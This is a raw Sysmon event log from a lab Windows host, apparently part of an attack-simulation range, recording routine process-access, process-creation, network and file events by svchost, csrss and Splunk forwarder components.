10341000x8000000000000000214226Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:48.107{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214225Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:48.107{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214224Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:48.107{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214223Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:48.107{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214222Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:48.107{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214221Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:48.107{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214220Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:48.107{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214219Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:48.107{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214218Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:48.107{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214217Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:48.107{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-0E40-6216-F803-000000003902}2620C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000214216Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:48.107{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-0E40-6216-F803-000000003902}2620C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000214215Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:48.108{4F8D34B0-0E40-6216-F803-000000003902}2620C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000214258Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:49.982{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-0E41-6216-FA03-000000003902}712C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214257Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:49.982{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214256Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:49.982{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214255Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:49.982{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214254Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:49.982{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214253Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:49.982{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214252Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:49.982{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214251Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:49.982{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214250Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:49.982{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214249Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:49.982{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214248Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:49.982{4F8D34B0-F11B-6215-0500-000000003902}412532C:\Windows\system32\csrss.exe{4F8D34B0-0E41-6216-FA03-000000003902}712C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000214247Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:49.982{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-0E41-6216-FA03-000000003902}712C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000214246Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:49.983{4F8D34B0-0E41-6216-FA03-000000003902}712C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000214245Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:47.641{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51175-false10.0.1.12-8000- 23542300x8000000000000000214244Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:49.529{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AC2FF6479931722D43C8D6DF850FD269,SHA256=4DADCC81500FAA4ABB375032175DEA8DCA0CAFFAF53D39FEC9C89F72344FAAC8,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000214243Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 